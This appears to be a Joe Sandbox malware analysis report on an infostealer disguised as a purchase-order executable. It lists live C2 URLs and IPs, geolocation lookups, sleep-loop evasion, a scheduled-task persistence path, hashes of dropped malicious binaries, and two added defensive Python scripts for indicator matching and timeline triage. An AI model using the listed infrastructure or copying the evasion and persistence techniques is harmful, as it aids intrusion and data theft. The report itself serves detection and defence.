http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1420209472.0000000003493000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.000000000777C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007849000.00000004.00000800.00020000.00000000.sdmp, YRtQgzFlDnVSru.exe, 00000016.00000002.1552755563.0000000002689000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp | false
http://47.129.31.212/agmjd | vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2747734535.0000000009D04000.00000004.00000020.00020000.00000000.sdmp | false
http://47.129.31.212:80/agmjdrrnmmetm0 | vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp | false
http://18.141.10.107/jqj | vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp | false
https://reallyfreegeoip.org8 | vbc.exe, 00000009.00000002.2696625029.00000000077A8000.00000004.00000800.00020000.00000000.sdmp | false
http://checkip.dyndn | vbc.exe, 00000009.00000002.2696625029.0000000007861000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007831000.00000004.00000800.00020000.00000000.sdmp | false
https://reallyfreegeoip.org/xml/ | vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp | false
http://82.112.184.197/fmyrcucxukod | vbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197:80/fmyrcucxukod | vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197/algtvyjJ | alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmp | false
http://47.129.31.212/H | vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197/oxlmrobhj | vbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp | false
http://checkip.dyndns.org | vbc.exe, 00000009.00000002.2696625029.0000000007861000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007831000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmp | false
http://47.129.31.212/S | vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197/lsfncqfq | vbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp | false
http://82.112.184.197:80/oxlmrobhj | vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp | false
http://18.141.10.107/j | vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp | false
https://reallyfreegeoip.org/xml/8.46.123.228l | vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmp | false
https://reallyfreegeoip.org | vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmp | false
http://www.winimage.com/zLibDll | SingleClientServicesUpdater.exe.9.dr | false
http://47.129.31.212/7 | vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp | false
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | true
47.129.31.212 | xlfhhhm.biz | Canada | 34533 | ESAMARA-ASRU | false
172.234.222.138 | przvgke.biz | United States | 20940 | AKAMAI-ASN1EU | true
82.112.184.197 | lpuegx.biz | Russian Federation | 43267 | FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU | true
18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02US | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
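The contacted-domain and IP tables above are the indicators a responder will want in machine-readable form. The following Python is an added example, not part of the Joe Sandbox report: it parses the domain rows in the form the report extraction produced (the Active and Malicious cells run together, e.g. "truetrue" or "unknowntrue"), then matches constructed DNS query log lines against them by exact domain, parent domain, and resolved IP. The log line format, the host names, the marker "-" for an empty answer, and the decision to report checkip.dyndns.org, checkip.dyndns.com and reallyfreegeoip.org as low-confidence reconnaissance rather than C2 are assumptions of the example; the indicator values are copied from the report.

```python
"""Turn the report's contacted-domain rows into indicators and scan DNS logs."""
import re
from dataclasses import dataclass
from typing import Optional

# Rows copied from the report's contacted-domain table, one per line:
#   <name> <resolved IP or "unknown"> <active><malicious>
# The last token is the report's two boolean cells fused by extraction.
REPORT_DOMAIN_ROWS = """\
przvgke.biz 172.234.222.138 truetrue
lpuegx.biz 82.112.184.197 truetrue
ssbzmoy.biz 18.141.10.107 truefalse
vjaxhpbji.biz 82.112.184.197 truetrue
xlfhhhm.biz 47.129.31.212 truefalse
reallyfreegeoip.org 104.21.67.152 truetrue
vcddkls.biz 18.141.10.107 truefalse
checkip.dyndns.com 132.226.247.73 truefalse
zlenh.biz unknown unknowntrue
checkip.dyndns.org unknown unknowntrue
knjghuig.biz unknown unknowntrue
"""

# Assumption: these public services only tell the stealer its own public IP /
# country, so a hit is reported as "recon" (low confidence) rather than "c2".
GEO_CHECK_DOMAINS = frozenset(
    {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
)


@dataclass(frozen=True)
class Indicator:
    name: str
    ip: Optional[str]   # None where the report shows "unknown"
    active: str         # "true", "false" or "unknown", exactly as reported
    malicious: bool


_FLAGS = re.compile(r"^(true|false|unknown)(true|false)$")


def parse_domain_rows(text: str) -> list:
    """Split each row into an Indicator; the fused flag cell is decoded by regex."""
    indicators = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, ip, flags = line.split()
        m = _FLAGS.match(flags)
        if m is None:
            raise ValueError(f"unexpected flag cell {flags!r} in row {line!r}")
        indicators.append(Indicator(
            name=name.lower(),
            ip=None if ip == "unknown" else ip,
            active=m.group(1),
            malicious=(m.group(2) == "true"),
        ))
    return indicators


def build_lookup(indicators):
    """Index indicators by domain and by resolved IP (one IP may serve several names)."""
    by_domain = {i.name: i for i in indicators}
    by_ip = {}
    for i in indicators:
        if i.ip is not None:
            by_ip.setdefault(i.ip, []).append(i)
    return by_domain, by_ip


def _domain_match(query: str, by_domain):
    """Exact or parent-domain match: api.vjaxhpbji.biz still hits vjaxhpbji.biz."""
    labels = query.lower().rstrip(".").split(".")
    for k in range(len(labels)):
        candidate = ".".join(labels[k:])
        if candidate in by_domain:
            return by_domain[candidate]
    return None


# Constructed log format (assumption): <ts> host=<name> query=<fqdn> answer=<ip|->
_LOG = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) query=(?P<query>\S+) answer=(?P<answer>\S+)$")


def scan_dns_log(lines, indicators):
    """Return (host, query, verdict, matched_by) for every log line that hits an indicator."""
    by_domain, by_ip = build_lookup(indicators)
    hits = []
    for line in lines:
        m = _LOG.match(line.strip())
        if m is None:
            continue
        matched_by = "domain"
        ind = _domain_match(m["query"], by_domain)
        if ind is None and m["answer"] in by_ip:
            # A name the report never saw (fresh DGA output) resolving to a
            # known C2 address is still worth raising.
            ind = by_ip[m["answer"]][0]
            matched_by = "ip"
        if ind is None:
            continue
        if ind.name in GEO_CHECK_DOMAINS:
            verdict = "recon"
        elif ind.malicious:
            verdict = "c2"
        else:
            verdict = "suspicious"   # contacted by the sample, not flagged by the report
        hits.append((m["host"], m["query"], verdict, matched_by))
    return hits


# Constructed sample log, not taken from any real network.
SAMPLE_LOG = [
    "2024-11-28T21:45:02Z host=WS01 query=przvgke.biz answer=172.234.222.138",
    "2024-11-28T21:45:03Z host=WS01 query=checkip.dyndns.org answer=132.226.247.73",
    "2024-11-28T21:45:09Z host=WS02 query=www.example.com answer=93.184.216.34",
    "2024-11-28T21:45:11Z host=WS02 query=api.vjaxhpbji.biz answer=-",
    "2024-11-28T21:45:15Z host=WS03 query=newdga.biz answer=82.112.184.197",
    "2024-11-28T21:45:20Z host=WS03 query=xlfhhhm.biz answer=47.129.31.212",
]

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_LOG, parse_domain_rows(REPORT_DOMAIN_ROWS)):
        print(hit)
```

Feeding it the sample log yields five hits: two C2 domain matches (one via the parent domain), one C2 match by resolved IP only, one reconnaissance check, and one "suspicious" contact for xlfhhhm.biz, which the report lists as contacted but not malicious. The parent-domain walk matters because the .biz names here look generated, so new hostnames under the same domains should not slip past an exact-match list.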
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1564874
Start date and time: 2024-11-28 22:43:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 44
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ_PO N89397-GM7287-Order.bat.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@36/178@44/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 327
• Number of non-executed functions: 34
Cookbook Comments:
• Found application associated with file extension: .exe
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, SearchIndexer.exe, SearchProtocolHost.exe, WMIADAP.exe, conhost.exe, WmiApSrv.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.81.94.65
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                    • VT rate limit hit for: RFQ_PO N89397-GM7287-Order.bat.exe
Time      Type              Description
16:44:21  API Interceptor   2x Sleep call for process: RFQ_PO N89397-GM7287-Order.bat.exe modified
16:44:24  API Interceptor   59x Sleep call for process: powershell.exe modified
16:44:33  API Interceptor   2x Sleep call for process: YRtQgzFlDnVSru.exe modified
16:44:37  API Interceptor   147848x Sleep call for process: vbc.exe modified
16:44:38  API Interceptor   6x Sleep call for process: alg.exe modified
16:45:03  API Interceptor   201x Sleep call for process: msdtc.exe modified
22:44:27  Task Scheduler    Run new task: YRtQgzFlDnVSru path: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
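The timeline above carries two findings a responder would pull out first: the injected vbc.exe process issued 147,848 Sleep calls (the sandbox's API interceptor patches Sleep, which is what "modified" means, so a count that high is a sleep loop meant to outwait the analysis window, not real delays), and a scheduled task was registered whose binary lives under the user's AppData\Roaming, the same behavior the Sigma hit "Scheduled temp file as task from temp location" points at. The following Python is an added triage example, not part of the Joe Sandbox report or of the sample: it parses rows in the Time/Type/Description shape shown above, aggregates Sleep counts per process, and flags tasks that run from user-writable paths. The TIMELINE text is constructed from the table rows; the 1000-call threshold and the user-writable path patterns are this example's own assumptions.

```python
"""Triage of a Joe Sandbox behaviour timeline: sleep-loop evasion and
scheduled tasks whose action runs from a user-writable directory.

Added example for this report; it is not Joe Sandbox code and not part of
the sample. TIMELINE is constructed from the report's Time/Type/Description
rows; the threshold and path patterns are assumptions to adjust per case.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed from the report's timeline table (tab-separated columns).
TIMELINE = (
    "16:44:21\tAPI Interceptor\t2x Sleep call for process: RFQ_PO N89397-GM7287-Order.bat.exe modified\n"
    "16:44:24\tAPI Interceptor\t59x Sleep call for process: powershell.exe modified\n"
    "16:44:33\tAPI Interceptor\t2x Sleep call for process: YRtQgzFlDnVSru.exe modified\n"
    "16:44:37\tAPI Interceptor\t147848x Sleep call for process: vbc.exe modified\n"
    "16:44:38\tAPI Interceptor\t6x Sleep call for process: alg.exe modified\n"
    "16:45:03\tAPI Interceptor\t201x Sleep call for process: msdtc.exe modified\n"
    "22:44:27\tTask Scheduler\tRun new task: YRtQgzFlDnVSru path: "
    "C:\\Users\\user\\AppData\\Roaming\\YRtQgzFlDnVSru.exe\n"
)

SLEEP_RE = re.compile(r"^(\d+)x Sleep call for process: (.+) modified$")
TASK_RE = re.compile(r"^Run new task: (\S+) path: (.+)$")
# Directories an unprivileged user can write to (assumption; extend as needed).
USER_WRITABLE_RE = re.compile(
    r"\\users\\[^\\]+\\appdata\\|\\users\\public\\|\\programdata\\|\\windows\\temp\\",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Event:
    time: str
    kind: str
    description: str


def parse_timeline(text: str) -> list[Event]:
    """Split tab-separated Time/Type/Description rows into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, kind, description = line.split("\t", 2)
        events.append(Event(time, kind, description))
    return events


def sleep_counts(events: list[Event]) -> dict[str, int]:
    """Sum intercepted Sleep calls per process name."""
    counts: dict[str, int] = {}
    for ev in events:
        m = SLEEP_RE.match(ev.description)
        if ev.kind == "API Interceptor" and m:
            counts[m.group(2)] = counts.get(m.group(2), 0) + int(m.group(1))
    return counts


def flag_sleep_evasion(events: list[Event], threshold: int = 1000) -> list[tuple[str, int]]:
    """Processes whose Sleep count reaches the threshold, highest count first.

    The sandbox shortens Sleep ("modified"), so a very large count indicates a
    sleep loop used as a timing evasion rather than genuine waiting.
    """
    hits = [(proc, n) for proc, n in sleep_counts(events).items() if n >= threshold]
    return sorted(hits, key=lambda pn: pn[1], reverse=True)


def flag_user_writable_tasks(events: list[Event]) -> list[tuple[str, str]]:
    """(task name, binary path) for new scheduled tasks run from user-writable dirs."""
    hits = []
    for ev in events:
        m = TASK_RE.match(ev.description)
        if ev.kind == "Task Scheduler" and m and USER_WRITABLE_RE.search(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


def triage(text: str, sleep_threshold: int = 1000) -> dict:
    """Run both checks over a timeline and return a summary dict."""
    events = parse_timeline(text)
    return {
        "events": len(events),
        "sleep_evasion": flag_sleep_evasion(events, sleep_threshold),
        "user_writable_tasks": flag_user_writable_tasks(events),
    }


if __name__ == "__main__":
    for key, value in triage(TIMELINE).items():
        print(f"{key}: {value}")
```

Run against the rows above, the only sleep-evasion hit at the default threshold is vbc.exe with 147,848 calls; lowering the threshold to 100 also surfaces msdtc.exe (201), which is the injected target for the second stage, so the threshold is a tuning knob, not a verdict. The task check matches the path, not the task name, because the name here is random and will differ per sample.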
                                                                                                                                                                    No context
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1353216
                                                                                                                                                                    Entropy (8bit):5.324397429350343
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:CC4VQjGARQNhiZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:COCAR0iZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:4C2E41161011A81854254AC402555CE9
                                                                                                                                                                    SHA1:B154E1F0100D20AC92090BF59BBE9BA8CAFCACEC
                                                                                                                                                                    SHA-256:755BDDA862DC1A40B5A03B77713FEA60B30A2A321AF545DA6A290635E0993EF2
                                                                                                                                                                    SHA-512:C1572A3556795B022E18DA8853E09A22A4A1CFBAC4B9C9B2714195C5B6A0284F7723D5FFAFA02FD6FA14E698AD859DB205886359992739B0BD6D6645FCA3E485
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1294848
                                                                                                                                                                    Entropy (8bit):5.282713099627815
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:FNUpaKghiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FCMKgwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:68FF6ADCBB0A75357688BBD0E1FAB7B3
                                                                                                                                                                    SHA1:E08F38FE20D41B58ACBA3AC6F63391238F513DDC
                                                                                                                                                                    SHA-256:158C13A11DBFDF4DB6684B751081BF01B0F26ECDC8E61C0BB5CBCE8E3AC1050A
                                                                                                                                                                    SHA-512:0AD72EF583D5E0635EC696CA41C6CD48AA016957A733EBAE0FD1D8FE85E7D266602DB65C7EFD0F6676C60E63D7AA1EC6FE432CAEE9F69A435708203E0A5B55D4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....qJ......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1314304
                                                                                                                                                                    Entropy (8bit):5.274145322413067
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:bMEhwdbTdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tKdHdsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:C22221643AD1A9C42F54E6D057D51A24
                                                                                                                                                                    SHA1:3B278E755089DC18F8FDE4F0377A4DF86753B8AB
                                                                                                                                                                    SHA-256:22879248AD33B21703BEA40BB629B3A7B6A0163DE210853076FB13796E1A686A
                                                                                                                                                                    SHA-512:5AC7442D1E637B6605E7E69F8EBBF85EEE3F2C8E4FB4ED4E5A6F95BF47E7B3222BE3CAEF1342ED68EACDDBF421F3FAD308F8B05712040154F9BF12B383150958
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !.....;..... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2203136
                                                                                                                                                                    Entropy (8bit):7.6470360055215005
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:QK0eqkSR7Xgo4TiRPnLWvJZDmg27RnWGj:QK0pR7Xn4TiRCvJZD527BWG
                                                                                                                                                                    MD5:E7AB3AA0C8ACED18E7679E0C6C01BFDB
                                                                                                                                                                    SHA1:68FAA0C6239CC7DFE5317A6E29A377F804DEAD5B
                                                                                                                                                                    SHA-256:93EBD57947D795A2F85DBCCBB26D8F2057F55F3BE6ABF46890CD667CB4D104D7
                                                                                                                                                                    SHA-512:E8CC71CA19F87A6AE5604A1061C3F91F965549185FD25FB0AF676673DB6D115D58C44734B5A5F4F737B3E52340EE20D9D0D4AE79491E781113BD2FD55F198466
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2369024
                                                                                                                                                                    Entropy (8bit):7.56505873975263
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:/fYP1JsEDkSR7Xgo4TiRPnLWvJZDmg27RnWGj:3YPBR7Xn4TiRCvJZD527BWG
                                                                                                                                                                    MD5:F7C2C152467B3D928F356D5C21916A55
                                                                                                                                                                    SHA1:46D3470EC886DD63932E9998EC610385CADB13C2
                                                                                                                                                                    SHA-256:8AD33A0B90546483B20F6F642901DDC327380F64AA01E71D5C1CDC9711FE2A8C
                                                                                                                                                                    SHA-512:B91AC59C88C5BCF953C0B63C0FCDF1C152C609F1D66EE4A2C0CCA9D7AC142A0C7AF0071ECF5D534E1E760DB3BCA4809AC9C60CBCE764FCE996177CA3E274A419
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......%... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1245184
                                                                                                                                                                    Entropy (8bit):5.12357943924453
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:k62SYUcknnvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:xYUcknvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:443FFDD0A29C04771375A070D32DEF97
                                                                                                                                                                    SHA1:AAB149D73CE13407FCEA095CA76F8AC2EF2079BB
                                                                                                                                                                    SHA-256:5FEEE380CFC8C1E30B4DA001A27870055A1ED8E2AE28C2D78D9B469ED6A26F2F
                                                                                                                                                                    SHA-512:177F6D4922B3F60B6344460321166A71C523A2DBE508BCD941C8CBF41BEB6FFC0FEDD399FD51172496521740B3AC00440665F8FCEA75736FA0A6C1C4E062B2E0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@.......,.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1640448
Entropy (8bit):7.16667679223097
Encrypted:false
SSDEEP:49152:++iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS1Dmg27RnWGj:qSktbpTD527BWG
MD5:4D41765CF6C8E806DA7114BFF494B34D
SHA1:229838DE82E050B916C4E7F888EBE84C1D5CDF2B
SHA-256:44D1A2A897C26F89F8BDB678155F7F313F21E7C79B9F358808157130B36706A2
SHA-512:BC274329AFC478608E095D4FB33DCB0E4A4C34A58B244F32607B1E33DEB5DD49B1AC9A3524D69A5F89C373AB04F8CE9CFBDEE6B7B53553271A2D940C3DDFB5CF
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2953728
Entropy (8bit):7.094631430460647
Encrypted:false
SSDEEP:49152:uGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxL+Dmg27RnWGj:K4OEtwiICvYMRfeD527BWG
MD5:83AC59C9FDF4021ACDEC76D82ECEFA88
SHA1:F57FA4F72542C7E7F528FFE96D123DB72C8AE4A1
SHA-256:19EEA7FEB74873F74F7F004BD4834466A921D00DC1179126EDD91E8EF64F279F
SHA-512:0CE6148A74DB858F2A36CCA2C57C4DDB8A6F02F2C9F86FACF1D2083FB8702D695FA32F66967820FFADDFA47A83776D0CEE28CF51A74217ABF75077F4D1B5F212
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1485824
Entropy (8bit):5.496411717236595
Encrypted:false
SSDEEP:24576:gAMuR+3kMbVjhJsqjnhMgeiCl7G0nehbGZpbD:hD+lbVjhNDmg27RnWGj
MD5:411C9789FE41993B74B7EBA11856F55C
SHA1:68546F9097C24A11F47309292A9B08B37456A66F
SHA-256:65687F81288F1CA0AB1B6D4A30D0FD67F203227C6F09983C55E8C3D538565626
